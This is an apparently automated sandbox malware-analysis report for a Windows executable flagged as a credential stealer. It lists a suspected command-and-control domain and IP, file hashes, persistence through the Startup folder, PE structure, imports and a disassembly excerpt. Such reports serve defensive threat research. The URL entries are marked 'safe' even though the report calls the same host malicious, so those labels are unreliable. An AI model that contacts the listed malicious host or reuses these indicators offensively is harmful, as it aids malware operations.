    https://peerhost59mj7i6macla65r.com/search/E-Hcurl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/n64;curl.exe, 0000000C.00000002.2275811158.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001B.00000002.2429446057.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/cbcurl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/g_curl.exe, 0000001D.00000003.2454254677.0000000003778000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000002.2454940776.0000000003778000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/Tcurl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/7curl.exe, 00000019.00000002.2404181964.00000000030D7000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/Wcurl.exe, 0000001B.00000002.2429620320.00000000008F7000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/cur32.dllcurl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.2301039187.00000000032A9000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/735C4465736B746F705C66696C652E657865file.exe, 00000000.00000003.2211257605.00000000010F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2277109701.0000000001176000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/ow-curl.exe, 0000001D.00000003.2454254677.0000000003778000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001D.00000002.2454940776.0000000003778000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/Ticurl.exe, 00000009.00000002.2244193304.0000000003058000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/;curl.exe, 0000000C.00000002.2275811158.00000000032E8000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/ccurl.exe, 00000021.00000002.2481616714.0000000003318000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    94.154.172.218
    peerhost59mj7i6macla65r.comGermany
    10753LVLT-10753UStrue
    IP
    127.0.0.1
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1573844
    Start date and time:2024-12-12 16:45:08 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 6m 47s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:36
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:file.exe
    Detection:MAL
    Classification:mal100.spre.adwa.spyw.evad.winEXE@48/4@1/2
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 97%
    • Number of executed functions: 51
    • Number of non-executed functions: 301
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
    • Excluded IPs from analysis (whitelisted): 20.190.181.0, 13.107.246.63, 52.149.20.212
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size getting too big, too many NtSetInformationFile calls found.
    • VT rate limit hit for: file.exe
    TimeTypeDescription
    16:46:21AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    94.154.172.218file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
    • proxyhostx1pjczefs9hedd6.com/update/
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    peerhost59mj7i6macla65r.comyiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
    • 94.154.172.218
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    LVLT-10753USjew.arm.elfGet hashmaliciousUnknownBrowse
    • 148.57.27.159
    Needed Aircraft PN#_Desc_&_Qty Details.vbsGet hashmaliciousAsyncRAT, VenomRATBrowse
    • 45.88.88.7
    Turbo Generator_Pictures & Drawing.vbsGet hashmaliciousUnknownBrowse
    • 45.88.88.7
    Payment Remittance Advice Details.vbsGet hashmaliciousUnknownBrowse
    • 45.88.88.7
    List of Required PN#_Desc_&_Qty Details.vbsGet hashmaliciousUnknownBrowse
    • 45.88.88.7
    Dec_2024 Shipment Packing List.vbsGet hashmaliciousAsyncRAT, VenomRATBrowse
    • 45.88.88.7
    Payment Advice-Dec-2024.vbsGet hashmaliciousUnknownBrowse
    • 45.88.88.7
    Payment Remittance Advice for Nov 2024.vbsGet hashmaliciousUnknownBrowse
    • 45.88.88.7
    yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
    • 94.154.172.218
    vwkjebwi686.elfGet hashmaliciousMiraiBrowse
    • 178.215.238.4
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    74954a0c86284d0d6e1c4efefe92b521yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
    • 94.154.172.218
    Document.lnk.download.lnkGet hashmaliciousUnknownBrowse
    • 94.154.172.218
    aLsxeH29P2.exeGet hashmaliciousUnknownBrowse
    • 94.154.172.218
    c9a6BV0eQO.exeGet hashmaliciousUnknownBrowse
    • 94.154.172.218
    dYUteuvmHn.exeGet hashmaliciousUnknownBrowse
    • 94.154.172.218
    new.ini.ps1Get hashmaliciousUnknownBrowse
    • 94.154.172.218
    ALFq7XP17d.lnkGet hashmaliciousUnknownBrowse
    • 94.154.172.218
    kYGxoN4JVW.batGet hashmaliciousUnknownBrowse
    • 94.154.172.218
    pn866G3CCj.lnkGet hashmaliciousUnknownBrowse
    • 94.154.172.218
    vZAhXkWkDT.lnkGet hashmaliciousUnknownBrowse
    • 94.154.172.218
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeyiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
      Process:C:\Windows\SysWOW64\curl.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):2
      Entropy (8bit):1.0
      Encrypted:false
      SSDEEP:3:y:y
      MD5:81051BCC2CF1BEDF378224B0A93E2877
      SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
      SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
      SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
      Malicious:false
      Preview:..
      Process:C:\Windows\SysWOW64\curl.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):34
      Entropy (8bit):4.211744090932182
      Encrypted:false
      SSDEEP:3:0uvql5jY:pvql5jY
      MD5:557464A645CBCC72FB20348E1C58DBFD
      SHA1:2A68B1E4C9CCA06C959A3174058A27DA0FADDADD
      SHA-256:2FB99E1172EC47D7D0A943294A483E9C695D774AD9ECA0C689EB0E4AD4982C66
      SHA-512:728FBA91E931258ED5AD1FF48299193384C0053770E05C0F813E8407DD328454C2C233DA52EA67EB5AAF1C523A8D0E5DE5A30B9BC94186E62C204B26DF23123E
      Malicious:false
      Preview:[Audio].Default=900.Auto=1.Force=0
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):2250
      Entropy (8bit):4.493446986425489
      Encrypted:false
      SSDEEP:48:AjuD3CC2GZ1EGK/WI49Uog4kKdQhk+mzpEAcCGuJUbV51FRZC:AjuDyC238USkKdQe+o++Ux5Py
      MD5:698EA08FA2CDA0B83B5DBBFAA4774C79
      SHA1:F11176C8D449207BA9608127E3271A02C7E34139
      SHA-256:A5BC214A1B20CDA5AFA36735B29DE1E5B0573E50FC9A4BE8E3002831A8DD0BC6
      SHA-512:368EFA38D1DF0FBA2D5E605A9A5A9CC4CC9E88371F28F7A1D37200AC9E2F4EA54A4E991A6AB8BDC614F56C46226C8EAA412EFA525FBF580EAF54638386CCEABA
      Malicious:false
      Preview:..Host Name: user-PC..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.19045 N/A Build 19045..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: hardz..Registered Organization: ..Product ID: 00330-71388-77023-AAOEM..Original Install Date: 03/10/2023, 10:57:18..System Boot Time: 24/09/2023, 16:13:49..System Manufacturer: pPMrZmbUxk8Kmw2..System Model: HML6WVM7..System Type: x64-based PC..Processor(s): 2 Processor(s) Installed... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz.. [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz..BIOS Version: ECZO6 4O8YF, 21/11/2022..Windows Directory: C:\Windows..System Directory: C:\Win
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):920064
      Entropy (8bit):6.58614875892499
      Encrypted:false
      SSDEEP:12288:UqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgapT1:UqDEvCTbMWu7rQYlBQcBiT6rprG8at1
      MD5:5950611ED70F90B758610609E2AEE8E6
      SHA1:798588341C108850C79DA309BE33495FAF2F3246
      SHA-256:5270C4C6881B7D3EBAEA8F51C410BBA8689ACB67C34F20440527A5F15F3BC1E4
      SHA-512:7E51C458A9A2440C778361EB19F0C13EA4DE75B2CF54A5828F6230419FBF52C4702BE4F0784E7984367D67FABF038018E264E030E4A4C7DAC7BA93E5C1395B80
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      • Antivirus: ReversingLabs, Detection: 29%
      Joe Sandbox View:
      • Filename: yiDQb6GkBq.exe, Detection: malicious, Browse
      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....Xg.........."..........Z......w.............@..........................`......J.....@...@.......@.....................d...|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................
      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):6.58614875892499
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:file.exe
      File size:920'064 bytes
      MD5:5950611ed70f90b758610609e2aee8e6
      SHA1:798588341c108850c79da309be33495faf2f3246
      SHA256:5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4
      SHA512:7e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80
      SSDEEP:12288:UqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgapT1:UqDEvCTbMWu7rQYlBQcBiT6rprG8at1
      TLSH:4D159E0273D1C062FFAB92334B5AF6515BBC69260123E61F13981DB9BE701B1563E7A3
      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
      Icon Hash:aaf3e3e3938382a0
      Entrypoint:0x420577
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
      Time Stamp:0x675897F2 [Tue Dec 10 19:35:14 2024 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:5
      OS Version Minor:1
      File Version Major:5
      File Version Minor:1
      Subsystem Version Major:5
      Subsystem Version Minor:1
      Import Hash:948cc502fe9226992dce9417f952fce3
      Instruction
      call 00007F301C8612F3h
      jmp 00007F301C860BFFh
      push ebp
      mov ebp, esp
      push esi
      push dword ptr [ebp+08h]
      mov esi, ecx
      call 00007F301C860DDDh
      mov dword ptr [esi], 0049FDF0h
      mov eax, esi
      pop esi
      pop ebp
      retn 0004h
      and dword ptr [ecx+04h], 00000000h
      mov eax, ecx
      and dword ptr [ecx+08h], 00000000h
      mov dword ptr [ecx+04h], 0049FDF8h
      mov dword ptr [ecx], 0049FDF0h
      ret
      push ebp
      mov ebp, esp
      push esi
      push dword ptr [ebp+08h]
      mov esi, ecx
      call 00007F301C860DAAh
      mov dword ptr [esi], 0049FE0Ch
      mov eax, esi
      pop esi
      pop ebp
      retn 0004h
      and dword ptr [ecx+04h], 00000000h
      mov eax, ecx
      and dword ptr [ecx+08h], 00000000h
      mov dword ptr [ecx+04h], 0049FE14h
      mov dword ptr [ecx], 0049FE0Ch
      ret
      push ebp
      mov ebp, esp
      push esi
      mov esi, ecx
      lea eax, dword ptr [esi+04h]
      mov dword ptr [esi], 0049FDD0h
      and dword ptr [eax], 00000000h
      and dword ptr [eax+04h], 00000000h
      push eax
      mov eax, dword ptr [ebp+08h]
      add eax, 04h
      push eax
      call 00007F301C86399Dh
      pop ecx
      pop ecx
      mov eax, esi
      pop esi
      pop ebp
      retn 0004h
      lea eax, dword ptr [ecx+04h]
      mov dword ptr [ecx], 0049FDD0h
      push eax
      call 00007F301C8639E8h
      pop ecx
      ret
      push ebp
      mov ebp, esp
      push esi
      mov esi, ecx
      lea eax, dword ptr [esi+04h]
      mov dword ptr [esi], 0049FDD0h
      push eax
      call 00007F301C8639D1h
      test byte ptr [ebp+08h], 00000001h
      pop ecx
      Programming Language:
      • [ C ] VS2008 SP1 build 30729
      • [IMP] VS2008 SP1 build 30729
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x9e98.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0xde0000x7594.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      .rsrc0xd40000x9e980xa000ca2811cd2fd38e1e6e78fad970280636False0.3278076171875data5.429778137275275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .reloc0xde0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      NameRVASizeTypeLanguageCountryZLIB Complexity
      RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
      RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
      RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
      RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
      RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
      RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
      RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
      RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
      RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
      RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
      RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
      RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
      RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
      RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
      RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
      RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
      RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
      RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
      RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
      RT_RCDATA0xdc7b80x1160data1.0024730215827338
      RT_GROUP_ICON0xdd9180x76dataEnglishGreat Britain0.6610169491525424
      RT_GROUP_ICON0xdd9900x14dataEnglishGreat Britain1.25
      RT_GROUP_ICON0xdd9a40x14dataEnglishGreat Britain1.15
      RT_GROUP_ICON0xdd9b80x14dataEnglishGreat Britain1.25
      RT_VERSION0xdd9cc0xdcdataEnglishGreat Britain0.6181818181818182
      RT_MANIFEST0xddaa80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
      DLLImport
      WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
      MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
      WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
      PSAPI.DLLGetProcessMemoryInfo
      IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
      USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
      UxTheme.dllIsThemeActive
      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
      USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
      GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
